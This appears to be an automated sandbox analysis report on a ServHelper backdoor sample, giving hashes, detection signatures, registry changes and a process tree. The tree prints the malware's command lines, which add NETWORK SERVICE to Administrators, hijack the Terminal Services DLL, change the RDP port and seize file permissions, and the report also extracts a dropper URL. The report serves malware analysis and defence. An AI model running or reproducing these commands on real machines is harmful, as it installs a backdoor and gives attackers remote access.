servhelper | 1826d874e7b2798a9c7e12af91f4ab3466c798ca7c26b6a1ac76bbdfc221cb1f

Analysis

max time kernel
92s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
15-07-2024 05:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4854d8c74fcf1aeb5138075a5b029f91_JaffaCakes118.exe
Size

5.7MB
MD5

4854d8c74fcf1aeb5138075a5b029f91
SHA1

375a02de564add94066335e4daa8e7233f0b4c05
SHA256

1826d874e7b2798a9c7e12af91f4ab3466c798ca7c26b6a1ac76bbdfc221cb1f
SHA512

1e47dd787053bf2963b8760d93daffbe9f285f8d60a6264ca6f90cd9dad5701cdc4f8c44461dcc15105b9b8a23cdc83dea985df7611e3a9451a4c4cce41c959a
SSDEEP

49152:UsAnsrrb/T/vO90dL3BmAFd4A64nsfJ13Dd95+bC+dTfixrrAq/n55SyZuKnyed7:UsPQzdtmAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor discovery execution exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
16	2228	powershell.exe
18	2228	powershell.exe
22	2228	powershell.exe
25	2228	powershell.exe
27	2228	powershell.exe
29	2228	powershell.exe
31	2228	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exe

pid process

3080 icacls.exe
2176 icacls.exe
1560 icacls.exe
1856 icacls.exe
1040 icacls.exe
5060 icacls.exe
4980 icacls.exe
3516 takeown.exe

pid	process
3080	icacls.exe
2176	icacls.exe
1560	icacls.exe
1856	icacls.exe
1040	icacls.exe
5060	icacls.exe
4980	icacls.exe
3516	takeown.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

4624
4624
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

4980 icacls.exe
3516 takeown.exe
3080 icacls.exe
2176 icacls.exe
1560 icacls.exe
1856 icacls.exe
1040 icacls.exe
5060 icacls.exe

pid	process
4624
4624

pid	process
4980	icacls.exe
3516	takeown.exe
3080	icacls.exe
2176	icacls.exe
1560	icacls.exe
1856	icacls.exe
1040	icacls.exe
5060	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

15 raw.githubusercontent.com
16 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

flow	ioc
15	raw.githubusercontent.com
16	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIDA36.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_musgza3c.5ss.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIDA66.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_lwhjh5xn.ixb.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGID9C6.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIDA16.tmp	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGID9F6.tmp	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

5004 powershell.exe
2488 powershell.exe
4984 powershell.exe
2228 powershell.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

1688 WMIC.exe

pid	process
5004	powershell.exe
2488	powershell.exe
4984	powershell.exe
2228	powershell.exe

pid	process
1688	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 970fa45f43d2da01	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4816 reg.exe
Runs net.exe

pid	process
4816	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	18	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	22	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1104	powershell.exe
1104	powershell.exe
5004	powershell.exe
5004	powershell.exe
2488	powershell.exe
2488	powershell.exe
4984	powershell.exe
4984	powershell.exe
1104	powershell.exe
1104	powershell.exe
1104	powershell.exe
2228	powershell.exe
2228	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

660
660

pid	process
660
660

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeRestorePrivilege	2176	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	1688	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1688	WMIC.exe
Token: SeAuditPrivilege	1688	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1688	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1688	WMIC.exe
Token: SeAuditPrivilege	1688	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4844	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4844	WMIC.exe
Token: SeAuditPrivilege	4844	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4844	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4844	WMIC.exe
Token: SeAuditPrivilege	4844	WMIC.exe
Token: SeDebugPrivilege	2228	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4854d8c74fcf1aeb5138075a5b029f91_JaffaCakes118.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 4768 wrote to memory of 1104	4768	4854d8c74fcf1aeb5138075a5b029f91_JaffaCakes118.exe	powershell.exe
PID 4768 wrote to memory of 1104	4768	4854d8c74fcf1aeb5138075a5b029f91_JaffaCakes118.exe	powershell.exe
PID 1104 wrote to memory of 5036	1104	powershell.exe	csc.exe
PID 1104 wrote to memory of 5036	1104	powershell.exe	csc.exe
PID 5036 wrote to memory of 2816	5036	csc.exe	cvtres.exe
PID 5036 wrote to memory of 2816	5036	csc.exe	cvtres.exe
PID 1104 wrote to memory of 5004	1104	powershell.exe	powershell.exe
PID 1104 wrote to memory of 5004	1104	powershell.exe	powershell.exe
PID 1104 wrote to memory of 2488	1104	powershell.exe	powershell.exe
PID 1104 wrote to memory of 2488	1104	powershell.exe	powershell.exe
PID 1104 wrote to memory of 4984	1104	powershell.exe	powershell.exe
PID 1104 wrote to memory of 4984	1104	powershell.exe	powershell.exe
PID 1104 wrote to memory of 3516	1104	powershell.exe	takeown.exe
PID 1104 wrote to memory of 3516	1104	powershell.exe	takeown.exe
PID 1104 wrote to memory of 3080	1104	powershell.exe	icacls.exe
PID 1104 wrote to memory of 3080	1104	powershell.exe	icacls.exe
PID 1104 wrote to memory of 2176	1104	powershell.exe	icacls.exe
PID 1104 wrote to memory of 2176	1104	powershell.exe	icacls.exe
PID 1104 wrote to memory of 1560	1104	powershell.exe	icacls.exe
PID 1104 wrote to memory of 1560	1104	powershell.exe	icacls.exe
PID 1104 wrote to memory of 1856	1104	powershell.exe	icacls.exe
PID 1104 wrote to memory of 1856	1104	powershell.exe	icacls.exe
PID 1104 wrote to memory of 1040	1104	powershell.exe	icacls.exe
PID 1104 wrote to memory of 1040	1104	powershell.exe	icacls.exe
PID 1104 wrote to memory of 5060	1104	powershell.exe	icacls.exe
PID 1104 wrote to memory of 5060	1104	powershell.exe	icacls.exe
PID 1104 wrote to memory of 4980	1104	powershell.exe	icacls.exe
PID 1104 wrote to memory of 4980	1104	powershell.exe	icacls.exe
PID 1104 wrote to memory of 3288	1104	powershell.exe	reg.exe
PID 1104 wrote to memory of 3288	1104	powershell.exe	reg.exe
PID 1104 wrote to memory of 4816	1104	powershell.exe	reg.exe
PID 1104 wrote to memory of 4816	1104	powershell.exe	reg.exe
PID 1104 wrote to memory of 2108	1104	powershell.exe	reg.exe
PID 1104 wrote to memory of 2108	1104	powershell.exe	reg.exe
PID 1104 wrote to memory of 1772	1104	powershell.exe	net.exe
PID 1104 wrote to memory of 1772	1104	powershell.exe	net.exe
PID 1772 wrote to memory of 1592	1772	net.exe	net1.exe
PID 1772 wrote to memory of 1592	1772	net.exe	net1.exe
PID 1104 wrote to memory of 1544	1104	powershell.exe	cmd.exe
PID 1104 wrote to memory of 1544	1104	powershell.exe	cmd.exe
PID 1544 wrote to memory of 4900	1544	cmd.exe	cmd.exe
PID 1544 wrote to memory of 4900	1544	cmd.exe	cmd.exe
PID 4900 wrote to memory of 3700	4900	cmd.exe	net.exe
PID 4900 wrote to memory of 3700	4900	cmd.exe	net.exe
PID 3700 wrote to memory of 1528	3700	net.exe	net1.exe
PID 3700 wrote to memory of 1528	3700	net.exe	net1.exe
PID 1104 wrote to memory of 3952	1104	powershell.exe	cmd.exe
PID 1104 wrote to memory of 3952	1104	powershell.exe	cmd.exe
PID 3952 wrote to memory of 2900	3952	cmd.exe	cmd.exe
PID 3952 wrote to memory of 2900	3952	cmd.exe	cmd.exe
PID 2900 wrote to memory of 5028	2900	cmd.exe	net.exe
PID 2900 wrote to memory of 5028	2900	cmd.exe	net.exe
PID 5028 wrote to memory of 1148	5028	net.exe	net1.exe
PID 5028 wrote to memory of 1148	5028	net.exe	net1.exe
PID 4968 wrote to memory of 4396	4968	cmd.exe	net.exe
PID 4968 wrote to memory of 4396	4968	cmd.exe	net.exe
PID 4396 wrote to memory of 4312	4396	net.exe	net1.exe
PID 4396 wrote to memory of 4312	4396	net.exe	net1.exe
PID 3668 wrote to memory of 3868	3668	cmd.exe	net.exe
PID 3668 wrote to memory of 3868	3668	cmd.exe	net.exe
PID 3868 wrote to memory of 3180	3868	net.exe	net1.exe
PID 3868 wrote to memory of 3180	3868	net.exe	net1.exe
PID 4808 wrote to memory of 556	4808	cmd.exe	net.exe
PID 4808 wrote to memory of 556	4808	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\4854d8c74fcf1aeb5138075a5b029f91_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\4854d8c74fcf1aeb5138075a5b029f91_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1104
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dcjzwavs\dcjzwavs.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5036
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB53.tmp" "c:\Users\Admin\AppData\Local\Temp\dcjzwavs\CSC660E0514DB234634B9F1EB3B5D551086.TMP"
      4⤵
      PID:2816
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2488
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4984
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3516
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3080
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2176
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1560
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1856
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1040
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5060
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4980
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:3288
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Server Software Component: Terminal Services DLL
    - Modifies registry key
    PID:4816
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2108
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1772
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:1592
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1544
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4900
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3700
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:1528
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3952
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2900
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
